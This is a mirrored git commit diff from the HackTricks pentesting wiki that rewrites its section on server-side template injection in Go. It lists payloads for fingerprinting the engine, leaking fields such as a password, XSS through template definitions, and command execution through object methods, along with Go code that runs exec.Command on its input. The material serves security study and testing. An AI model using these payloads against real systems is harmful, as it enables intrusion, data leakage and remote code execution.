mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-22 12:43:23 +00:00
GitBook: [#2983] No subject
This commit is contained in:
parent
5d0f41755d
commit
9641f5046e
1 changed files with 31 additions and 6 deletions
|
@ -810,15 +810,40 @@ Even if it's perl it uses tags like ERB in Ruby.
|
|||
<% perl code %>
|
||||
```
|
||||
|
||||
### Method Confusion in GO
|
||||
### SSTI in GO
|
||||
|
||||
It's possible to **call methods of the object** that is passed to the context of the template.\
|
||||
For example if an object has the method `System` to execute a command or the method `File` to read a file you could achieve **RCE** o **read arbitrary files** with:
|
||||
The way to confirm that the template engine used in the backed is Go you can use these payloads:
|
||||
|
||||
* `{{.System "whoami"}}`
|
||||
* `{{.File "/etc/passwd}}`
|
||||
* `{{ . }}` = data struct being passed as input to the template
|
||||
* If the passed data is an object that contains the attribute Password for example, the previous payload would leak it, but you could also do: `{{ .Password }}`
|
||||
* `{{printf "%s" "ssti" }}` = should output the string ssti in the response
|
||||
* `{{html "ssti"}}`, `{{js "ssti"}}` = These are a few other payloads which should output the string "ssti" without the trailing words "js" or "html". You can refer to more keywords in the engine [here](https://golang.org/pkg/text/template).
|
||||
|
||||
More information in the original research [https://www.onsecurity.io/blog/go-ssti-method-research/](https://www.onsecurity.io/blog/go-ssti-method-research/)
|
||||
#### XSS exploitation
|
||||
|
||||
If the server is **using the text/template** package, XSS is very easy to achieve by **simply** providing your **payload** as input. However, that is **not the case with html/template** as itHTMLencodes the response: `{{"<script>alert(1)</script>"}}` **** --> `<script>alert(1)</script>`
|
||||
|
||||
However, Go allows to **DEFINE** a whole **template** and then **later call it**. The payload will be something like:\
|
||||
`{{define "T1"}}<script>alert(1)</script>{{end}} {{template "T1"}}`
|
||||
|
||||
#### RCE Exploitation
|
||||
|
||||
The documentation for both the html/template module can be found [here](https://golang.org/pkg/html/template/), and the documentation for the text/template module can be found [here](https://golang.org/pkg/text/template/), and yes, they do vary, a lot. For example, in **text/templat**e, you can **directly call any public function with the “call” value**, this however, is not the case with html/template.
|
||||
|
||||
If you want to find a RCE in go via SSTI, you should know that as you can access the given object to the template with `{{ . }}`, you can also **call the objects methods**. So, imagine that the **passed object has a method called System** that executes the given command, you could abuse it with: `{{ .System("ls") }}`\
|
||||
Therefore, you will probably **need the source code**. A potential source code for something like that will look like:
|
||||
|
||||
```go
|
||||
func (p Person) Secret (test string) string {
|
||||
out, _ := exec.Command(test).CombinedOutput()
|
||||
return string(out)
|
||||
}
|
||||
```
|
||||
|
||||
#### More information 
|
||||
|
||||
* [https://blog.takemyhand.xyz/2020/05/ssti-breaking-gos-template-engine-to.html](https://blog.takemyhand.xyz/2020/05/ssti-breaking-gos-template-engine-to.html)
|
||||
* [https://www.onsecurity.io/blog/go-ssti-method-research/](https://www.onsecurity.io/blog/go-ssti-method-research/)
|
||||
|
||||
### More Exploits
|
||||
|
||||
|
|
Loading…
Reference in a new issue